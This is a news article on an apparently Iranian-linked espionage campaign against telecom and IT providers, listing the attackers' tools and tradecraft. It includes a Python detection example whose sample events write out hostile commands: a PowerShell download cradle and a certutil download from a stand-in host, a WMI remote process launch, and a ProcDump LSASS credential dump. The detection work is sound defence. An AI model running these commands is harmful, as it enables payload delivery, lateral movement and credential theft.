A new espionage hacking campaign has been detected by cybersecurity experts; it is continuously targeting telecommunication and IT service providers, especially in the Middle East and Asia.
After investigating the attack, the experts concluded that the threat actors are most likely connected to the Iranian threat actor group Mercury, and that they have mounted an attack on a string of telecom operators.
The threat actors have been running this campaign for over six months, and they initially targeted organizations in the following countries:-
- Saudi Arabia
- The United Arab Emirates
The first telecom attack took place in August 2021, and it came to light because security analysts found that the first evidence of compromise was a service used to launch an unknown Windows Script File (WSF).
In this attack the threat actors used PowerShell to download another WSF and run it, and they also used Certutil to download a suspected Ligolo tunneling tool.
The tool was downloaded to launch WMI, which was later used to reach remote machines so that the threat actors could carry out their planned tasks.
Tools and methods
In this type of attack, the threat actors make extensive use of scripts, which are later used to gather data and download additional tools. The threat actors used the eHorus remote access tool, which allowed them to do the following:-
- Deliver and run a Local Security Authority Subsystem Service (LSASS) dumping tool.
- Deliver Ligolo tunneling tools.
- Execute Certutil to request a URL from the Exchange Web Services (EWS) of other targeted organizations.
The security analysts have listed all the tools used by the threat actors in this attack, so we have reproduced them below:-
- ScreenConnect: Legitimate remote administration tool
- RemoteUtilities: Legitimate remote administration tool
- eHorus: Legitimate remote administration tool
- Ligolo: Reverse tunneling tool
- Hidec: Command line tool for running a hidden window
- Nping: Packet generation tool
- LSASS Dumper: Tool that dumps credentials from Local Security Authority Subsystem Service (LSASS) process
- SharpChisel: Tunneling tool
- Password Dumper
- CrackMapExec: Publicly available tool that is used to automate security assessment of an Active Directory environment
- ProcDump: Microsoft Sysinternals tool for monitoring an application for CPU spikes and generating crash dumps, but which can also be used as a general process dump utility
- SOCKS5 proxy server: Tunneling tool
- Keylogger: Retrieves browser credentials
- Mimikatz: Publicly available credential dumping tool
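Detection logic for the tradecraft described in the first attack (WSF launched via a script host, PowerShell downloading a further WSF, Certutil used as a downloader, WMI used to reach remote machines) and for the LSASS-dumping use of ProcDump from the tool list, as an added example that is not part of the original article or of Symantec's report. It runs a small rule set over constructed process-creation events in a Sysmon Event ID 1 style; the ProcEvent field names, host names, file paths and URLs are this example's own assumptions, not values from any real incident.

```python
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation event (Sysmon EID 1 / Windows 4688 style).
    The field names are this example's own assumption, not a real schema."""
    host: str
    image: str          # full path of the started process image
    cmdline: str        # its command line
    parent_image: str   # full path of the parent process image


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


# Each rule maps a name to a predicate over a single event.
RULES = {
    # A Windows Script File run by wscript/cscript that spawns PowerShell.
    "script_host_spawns_powershell": lambda e:
        _basename(e.parent_image) in {"wscript.exe", "cscript.exe"}
        and _basename(e.image) in {"powershell.exe", "pwsh.exe"},
    # PowerShell download cradle fetching a further payload (e.g. a second WSF).
    "powershell_download_cradle": lambda e:
        _basename(e.image) in {"powershell.exe", "pwsh.exe"}
        and re.search(r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|net\.webclient",
                      e.cmdline, re.I) is not None,
    # certutil used as a downloader rather than for certificate work.
    "certutil_download": lambda e:
        _basename(e.image) == "certutil.exe"
        and re.search(r"-urlcache", e.cmdline, re.I) is not None
        and re.search(r"https?://", e.cmdline, re.I) is not None,
    # WMI used to start a process on a remote machine.
    "wmi_remote_process_create": lambda e:
        _basename(e.image) == "wmic.exe"
        and re.search(r"/node:", e.cmdline, re.I) is not None
        and re.search(r"process\s+call\s+create", e.cmdline, re.I) is not None,
    # Any process other than lsass.exe itself naming LSASS on its command line,
    # e.g. ProcDump used as a general process dump utility against LSASS.
    "lsass_dump_attempt": lambda e:
        _basename(e.image) != "lsass.exe"
        and re.search(r"\blsass(\.exe)?\b", e.cmdline, re.I) is not None,
}

# The chain seen in the first attack: script host -> PowerShell -> Certutil.
CHAIN = ("script_host_spawns_powershell", "powershell_download_cradle", "certutil_download")


def detect(events):
    """Return (rule_name, host, cmdline) for every event that matches a rule."""
    hits = []
    for e in events:
        for name, pred in RULES.items():
            if pred(e):
                hits.append((name, e.host, e.cmdline))
    return hits


def hosts_with_full_chain(events):
    """Hosts on which every rule of CHAIN fired, i.e. the whole download chain was seen."""
    seen = defaultdict(set)
    for name, host, _ in detect(events):
        seen[host].add(name)
    return sorted(h for h, names in seen.items() if set(CHAIN) <= names)


# Constructed sample events (hypothetical hosts, paths and URLs; not real telemetry).
SAMPLE_EVENTS = [
    ProcEvent("WS01", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell -c (New-Object Net.WebClient).DownloadFile('http://example.invalid/stage2.wsf','C:\Users\Public\stage2.wsf')",
              r"C:\Windows\System32\wscript.exe"),
    ProcEvent("WS01", r"C:\Windows\System32\certutil.exe",
              r"certutil -urlcache -split -f http://example.invalid/stage3.exe C:\Users\Public\stage3.exe",
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent("WS01", r"C:\Windows\System32\wbem\WMIC.exe",
              r'wmic /node:SRV02 process call create "cmd /c C:\Users\Public\stage3.exe"',
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent("SRV02", r"C:\Tools\procdump64.exe",
              r"procdump64.exe -accepteula -ma lsass.exe C:\Windows\Temp\lsass.dmp",
              r"C:\Windows\System32\cmd.exe"),
    # Benign activity that must not alert.
    ProcEvent("WS03", r"C:\Windows\System32\certutil.exe",
              r"certutil -verify C:\certs\server.cer",
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent("WS03", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell -Command Get-Service",
              r"C:\Windows\explorer.exe"),
]


if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(hit)
    print("full chain on:", hosts_with_full_chain(SAMPLE_EVENTS))
```

The rules are deliberately narrow string matches so that routine certificate work and ordinary PowerShell use do not alert; in production the same predicates would be fed from a SIEM query over real process-creation telemetry, and the chain correlation in `hosts_with_full_chain` is what turns three individually noisy signals into a high-confidence finding.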
Connections with MuddyWater
The attribution isn't definitive, but the security analysts at Symantec have logged two IP addresses.
On closer investigation they found that both IP addresses overlap with infrastructure generally used in MuddyWater attacks.
Although they are doing their best to establish the key details, the threat actors are switching between organizations very quickly, which makes it very difficult for the experts to reach a firm conclusion.